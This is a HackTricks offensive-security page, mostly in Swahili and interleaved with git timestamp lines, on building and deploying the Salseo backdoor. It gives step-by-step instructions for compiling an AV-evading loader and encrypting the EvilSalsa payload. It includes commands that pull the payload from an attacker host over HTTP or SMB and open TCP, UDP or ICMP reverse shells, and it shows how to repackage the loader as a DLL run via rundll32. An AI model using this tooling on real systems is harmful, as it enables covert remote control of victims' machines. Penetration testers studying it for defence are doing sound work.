2024-04-06 19:39:38 +00:00
# Salseo
2024-07-18 22:14:33 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Learn & practice GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
< details >
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
< summary > Support HackTricks< / summary >
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
* Check the [**subscription plans** ](https://github.com/sponsors/carlospolop )!
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2024-04-06 19:39:38 +00:00
< / details >
2024-07-18 22:14:33 +00:00
{% endhint %}
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
## Compiling the binaries
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
Pakua msimbo wa chanzo kutoka github na uunde **EvilSalsa** na **SalseoLoader** . Utahitaji **Visual Studio** iliyosakinishwa ili kuunda msimbo huo.
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
Uunde miradi hiyo kwa ajili ya usanifu wa sanduku la windows ambapo unakusudia kuitumia (Ikiwa Windows inasaidia x64 uunde kwa usanifu huo).
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
Unaweza **kuchagua usanifu** ndani ya Visual Studio katika ** "Build" Tab** ya **kushoto "Platform Target".**
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
(\*\*Ikiwa huwezi kupata chaguo hili bonyeza kwenye ** "Project Tab"** kisha kwenye ** "\<Project Name> Properties"**)
2024-04-06 19:39:38 +00:00
2024-05-05 22:47:30 +00:00
 . png > )
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
Kisha, jenga miradi yote miwili (Build -> Build Solution) (Ndani ya log zitajitokeza njia ya executable):
2024-04-06 19:39:38 +00:00
2024-05-05 22:47:30 +00:00
 . png > )
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
## Prepare the Backdoor
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
Kwanza kabisa, utahitaji kuandika **EvilSalsa.dll.** Ili kufanya hivyo, unaweza kutumia script ya python **encrypterassembly.py** au unaweza kuunda mradi **EncrypterAssembly** :
2024-04-07 03:36:12 +00:00
### **Python**
2024-04-06 19:39:38 +00:00
```
python EncrypterAssembly/encrypterassembly.py < FILE > < PASSWORD > < OUTPUT_FILE >
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
### Windows
```
EncrypterAssembly.exe < FILE > < PASSWORD > < OUTPUT_FILE >
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
2024-07-18 22:14:33 +00:00
Ok, sasa una kila kitu unachohitaji kutekeleza mambo yote ya Salseo: **encoded EvilDalsa.dll** na **binary ya SalseoLoader.**
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
**Pakia binary ya SalseoLoader.exe kwenye mashine. Hazipaswi kugundulika na AV yoyote...**
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
## **Tekeleza backdoor**
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
### **Kupata TCP reverse shell (kupakua dll iliyosimbwa kupitia HTTP)**
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
Kumbuka kuanzisha nc kama msikilizaji wa reverse shell na seva ya HTTP kutoa evilsalsa iliyosimbwa.
2024-04-06 19:39:38 +00:00
```
SalseoLoader.exe password http://< Attacker-IP > /evilsalsa.dll.txt reversetcp < Attacker-IP > < Port >
```
2024-07-18 22:14:33 +00:00
### **Kupata shell ya UDP reverse (kushusha dll iliyokodiwa kupitia SMB)**
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
Kumbuka kuanzisha nc kama msikilizaji wa shell ya reverse, na seva ya SMB kutoa evilsalsa iliyokodiwa (impacket-smbserver).
2024-04-06 19:39:38 +00:00
```
SalseoLoader.exe password \\< Attacker-IP > /folder/evilsalsa.dll.txt reverseudp < Attacker-IP > < Port >
```
2024-07-18 22:14:33 +00:00
### **Kupata ICMP reverse shell (dll iliyosimbwa tayari ndani ya mwathiriwa)**
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
**Wakati huu unahitaji chombo maalum kwenye mteja kupokea reverse shell. Pakua:** [**https://github.com/inquisb/icmpsh** ](https://github.com/inquisb/icmpsh )
2024-04-06 19:39:38 +00:00
#### **Zima Majibu ya ICMP:**
```
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
#### Tekeleza mteja:
```
python icmpsh_m.py "< Attacker-IP > " "< Victm-IP > "
```
2024-07-18 22:14:33 +00:00
#### Ndani ya mwathiriwa, hebu tuendeshe kitu cha salseo:
2024-04-06 19:39:38 +00:00
```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp < Attacker-IP >
```
2024-07-18 22:14:33 +00:00
## Kuunda SalseoLoader kama DLL inayosafirisha kazi kuu
2024-04-06 19:39:38 +00:00
Fungua mradi wa SalseoLoader ukitumia Visual Studio.
### Ongeza kabla ya kazi kuu: \[DllExport]
2024-05-05 22:47:30 +00:00
 . png > )
2024-04-06 19:39:38 +00:00
### Sakinisha DllExport kwa mradi huu
2024-07-18 22:14:33 +00:00
#### **Zana** --> **Meneja wa Kifurushi cha NuGet** --> **Simamisha Kifurushi cha NuGet kwa Suluhisho...**
2024-04-06 19:39:38 +00:00
2024-05-05 22:47:30 +00:00
 . png > )
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
#### **Tafuta kifurushi cha DllExport (ukitumia kichupo cha Browse), na bonyeza Sakinisha (na kubali popup)**
2024-04-06 19:39:38 +00:00
2024-05-05 22:47:30 +00:00
 . png > )
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
Katika folda yako ya mradi, faili zifuatazo zimeonekana: **DllExport.bat** na **DllExport\_Configure.bat**
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
### **U**ondoe DllExport
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
Bonyeza **Ondoa** (ndiyo, ni ajabu lakini ni muhimu)
2024-04-06 19:39:38 +00:00
2024-05-05 22:47:30 +00:00
 . png > )
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
### **Toka Visual Studio na tekeleza DllExport\_configure**
2024-04-06 19:39:38 +00:00
Tu **toka** Visual Studio
2024-07-18 22:14:33 +00:00
Kisha, nenda kwenye **folda ya SalseoLoader** yako na **tekeleza DllExport\_Configure.bat**
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
Chagua **x64** (ikiwa unakusudia kuitumia ndani ya sanduku la x64, hiyo ilikuwa hali yangu), chagua **System.Runtime.InteropServices** (ndani ya **Namespace kwa DllExport** ) na bonyeza **Tumia**
2024-04-06 19:39:38 +00:00
2024-05-05 22:47:30 +00:00
 . png > )
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
### **Fungua mradi tena na Visual Studio**
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
**\[DllExport]** haipaswi kuwa na alama ya kosa tena
2024-04-06 19:39:38 +00:00
2024-05-05 22:47:30 +00:00
 . png > )
2024-04-06 19:39:38 +00:00
### Jenga suluhisho
2024-07-18 22:14:33 +00:00
Chagua **Aina ya Matokeo = Maktaba ya Darasa** (Mradi --> SalseoLoader Mali --> Programu --> Aina ya matokeo = Maktaba ya Darasa)
2024-04-06 19:39:38 +00:00
2024-05-05 22:47:30 +00:00
 . png > )
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
Chagua **jukwaa la x64** (Mradi --> SalseoLoader Mali --> Jenga --> Lengo la jukwaa = x64)
2024-04-06 19:39:38 +00:00
2024-05-05 22:47:30 +00:00
 . png > )
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
Ili **kujenga** suluhisho: Jenga --> Jenga Suluhisho (Ndani ya console ya Matokeo, njia ya DLL mpya itaonekana)
2024-04-06 19:39:38 +00:00
### Jaribu Dll iliyozalishwa
2024-07-18 22:14:33 +00:00
Nakili na ubandike Dll mahali unapotaka kuijaribu.
2024-04-06 19:39:38 +00:00
Tekeleza:
```
rundll32.exe SalseoLoader.dll,main
```
2024-07-18 22:14:33 +00:00
Ikiwa hakuna kosa linalojitokeza, huenda una DLL inayofanya kazi!!
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
## Pata shell ukitumia DLL
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
Usisahau kutumia **HTTP** **server** na kuweka **nc** **listener**
2024-04-06 19:39:38 +00:00
### Powershell
```
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
### CMD
```
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
2024-07-18 22:14:33 +00:00
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Jifunze na fanya mazoezi ya GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
< details >
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
< summary > Support HackTricks< / summary >
2024-04-06 19:39:38 +00:00
2024-07-18 22:14:33 +00:00
* Angalia [**mpango wa usajili** ](https://github.com/sponsors/carlospolop )!
* **Jiunge na** 💬 [**kikundi cha Discord** ](https://discord.gg/hRep4RUj7f ) au [**kikundi cha telegram** ](https://t.me/peass ) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) na [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) repos za github.
2024-04-06 19:39:38 +00:00
< / details >
2024-07-18 22:14:33 +00:00
{% endhint %}
